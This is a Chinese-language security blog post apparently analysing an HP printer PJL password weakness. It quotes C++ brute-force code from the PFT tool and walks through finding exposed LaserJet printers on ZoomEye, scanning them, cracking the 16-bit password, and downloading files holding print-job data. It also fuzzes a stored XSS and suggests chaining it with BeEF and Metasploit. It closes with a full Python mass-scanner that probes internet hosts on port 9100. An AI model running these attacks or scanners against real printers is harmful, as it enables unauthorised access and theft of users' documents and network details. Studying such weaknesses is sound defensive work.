打印机PCL漏洞原理分析

Published On July 20, 2015

0x01 漏洞概要

PCL代表打印机控制语言（Printer Control Language），由惠普公司开发，并被广泛使用的一种打印机协议。关于另一种页面描述语言，应该提一提由Adobe设计的PostScript（PS），它可以将更为复杂的事情交由绘图仪/打印机处理。PJL (Printer Job Language，打印机作业语言)作为PCL的扩展，用于指导打印机行为，比如更改设备设置、传输文件等。若打印机的9100端口向公网开启，在向打印机发送PJL指令之前需要对使用者的身份进行认证，认证程序的密钥长度为２字节(Byte)，因此可以通过暴力破解认证密钥想打印机发送PJL指令，最终导致任意命令的执行。

PJL (Printer Job Language)程序用于告诉打印机执行什么动作，是对PCL的额外支持。 PJL (Printer Job Language) 用于规范格式化页面的基本语言。本身是无害的，但却成为大多数解析器和解释器的漏洞利用代码。

0x02 漏洞原理

打印机系统9100端口开启时，若连上该端口通过PJL指令发送设备名称请求并得到打印机的响应，说明可以未授权访问打印机，PJL保护机制的密钥由２个字节(16比特)的存储单位存储，可以进行暴力破解攻击，从而得到目标打印机的完全访问权限。

根据国外安全研究员PHENOELIT 已经写好了漏洞利用程序，对其中的主要代码进行分析，得到下面的流程图

流程图

下面是破解密钥部分的代码：

在pjlsession.cpp中的230到256行

void PJLsession::blind_disable_pjl_password(unsigned int pass) {
	    String	ts;
	    char numb[50];
	    if ((pass==0)||(pass>65535)) throw ExInvalid();#ifndef UNIX
	    _snprintf(numb,49,"%u",pass);#else
	    snprintf(numb,49,"%u",pass);#endif //UNIX
	    connection.clear();
	    connection.sendbuf.set(PJL_START);
	    connection.sendbuf.append("\r\n");
	    connection.sendbuf.append("@PJL JOB PASSWORD=");
	    connection.sendbuf.append(numb);
	    connection.sendbuf.append("\r\n@PJL DEFAULT PASSWORD=0 \r\n");
	    connection.sendbuf.append("@PJL EOJ\r\n");
	    connection.sendbuf.append(PJL_FINISH);
	    connection.senddata();
	    // TEST !!!
	    // connection.recvatleast(9,ctimeout);
	    // end TEST
	    connection.sendbuf.clear();
	}

因为打印机所使用的密码长度只有2个字节，即16个bit, 65535中表示方法，所以密码范围在0到65535之间，这就是为什么程序能暴力破解打印机认证密码。

connection.sendbuf.set()后面根据PJL协议发送指定的数据包。使攻击者在破解密码之后可以用里面的命令进行任意操作了。

0x03 案例分析

首先获取可能存在漏洞的打印机IP地址，打开www.zoomeye.org，输入漏洞关键字HP LaserJet进行搜索。搜索结果如下：

HP LaserJet

从结果中可以看到一些带有HP LaserJet标签的互联网主机和所属国家信息，这些主机就很有可能隐藏着打印机漏洞。我们从中选取一些进行测试。

Nmap端口扫描

Nmap的扫描结果显示主机不但开启了9100端口，80，443，23端口也开着，入侵也就多了一些其他的方式。

Nmap

我们使用 PHENOELIT 开发的PFT工具来进行渗透测试。这个用C++写成的黑客工具有简单的命令行交互界面，专门用来破解PLJ接口的打印机，获取打印机的环境变量、文件系统和重要目标文件。

PFT密码破解

pft

我们运行PFT工具，用help命令查看帮助文档

help

可以用PFT提供的暴力破解功能清除掉打印机的PJL程序保护。

bruteforce

显示密码清除成功，使用ls命令查看打印机上硬盘里的文件：

remote

在这里可以查看打印机硬盘中存放的所有东西。如果打印机缓存了打印文件，在这里也是可以找到的。我们可以进入一个目录选择一个文件下载到本地：

download

查看L006105.XML文件的内容：

xml

在这里可以查看到一些诸如本次打印的任务主机IP，邮箱，打印的文件名等敏感信息。

XSS攻击

存在于惠普打印机中风险的仅仅是拒绝服务,信息泄漏这么简单吗?在 Exploit-DB网站中找到 HPLaserJet printers - Multiple Stored XSS Vulnerabilities(点击连接) 惠普打印机的多个存储型 XSS 漏洞, 对应 CVE 号: CVE-2012-3272 没给出利用方式，试着打开浏览器Fuzz了出来：点击WEB的“支持信息”连接

support

点击Apply按钮，出现了XSS弹框：

XSS

利用该漏洞，配合 Beef 攻击框架，通过一段编写好的 JavaScript（hook.js）控制目标主机的浏览器，通过目标主机浏览器获得该主机的详细信息，并进一步扫描内网，配合 Metasploit 绝对是内网渗透一大杀器。

0x04 全球漏洞分布

自动测试脚本

HP打印机的厂商已经对固件进行了升级，采用更安全的加密机制处理PJL密钥，不过由于全球范围用户基数比较大，已经用户安全意识不强，依然大量存在这种受害打印机，由ZoomEye网络空间搜索引擎导出的数据接合我们小组写的自动化扫描脚本。

#!/usr/bin/env python
    # -*- coding: UTF-8 -*-

    import socket
    import json
    import sys
    from optparse import OptionParser

    PJL_START = "\033%-12345X@PJL "
    PJL_FINISH = "\033%-12345X\r\n"
    PJL_USTATUS = "USTATUS DEVICE="
    PJL_INFO_ID = "INFO ID\r\n"

    EOF = PJL_START + PJL_USTATUS + "OFF\r\n" + PJL_FINISH  #PJL  语言 
    DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH  #PJL  语言  获取设备型号

    class Printer():
        def __init__(self):
            self.usage()
            if sys.argv < 1 :
                self.usage()
            self.readfile(options.file)

        def usage(self):
            parser = OptionParser()
            parser.add_option("-i", "--ip", dest="ip",
                              help="test single ip")  #
            parser.add_option("-f", "--file",dest="file",
                              help="files ") #
            global options
            (options, args) = parser.parse_args()

        def Buildsocket(self, ip, port=9100):
            sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)   #与主机建立socket连接
            sock.settimeout(5)
            try:
                sock.connect((ip, port))
            except:
                print "[!*]-ip-%s-can't connect--" % ip
                return 'error'
            sock.send(EOF)
            sock.send(DEVICEID)   # 发送PJL指令给远程打印机
            try:
                device = sock.recv(1024)
            except:
                return 'No'
            print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device)
            sock.close()
            return 'OK'

        def GetDiviceMap(self, data,status):
            f = open('result.txt', 'a+')
            try:
                f.write(str(data['ip']) + ', ' + status + ', ' + str(data['geoinfo']['country']['name']['en'])
                +', '+ str(data['geoinfo']['city']['en']) + ', ' + str(data['geoinfo']['location']['longitude'])
                +', '+ str(data['geoinfo']['location']['latitude']) + ', ' + str(data['geoinfo']['country']['code'])
                +', ' + str(data['geoinfo']['continent']['name']['en']) + "\r\n")
            except:
                pass
            f.close()

        def readfile(self, file):
            Vuln_ip = 0 # ip 列表输入的IP数量
            No_vuln_ip = 0
            CantConnectIP = 0
            linenum = 0
            f = open(file, 'r')
            for line in f.readlines():
                data = json.loads(line)
                status = self.Buildsocket(data['ip'])
                if status == 'error':
                    CantConnectIP += 1
                elif status == 'No':
                    No_vuln_ip += 1
                else:
                    Vuln_ip += 1
                self.GetDiviceMap(data, status)
                linenum += 1
                print "[!*]-Now-is-%s-lines" % str(linenum)
            f.close()
            print str(CantConnectIP) + "  " + str(No_vuln_ip) + "  " + str(Vuln_ip)

    if __name__ == '__main__':
        Printer()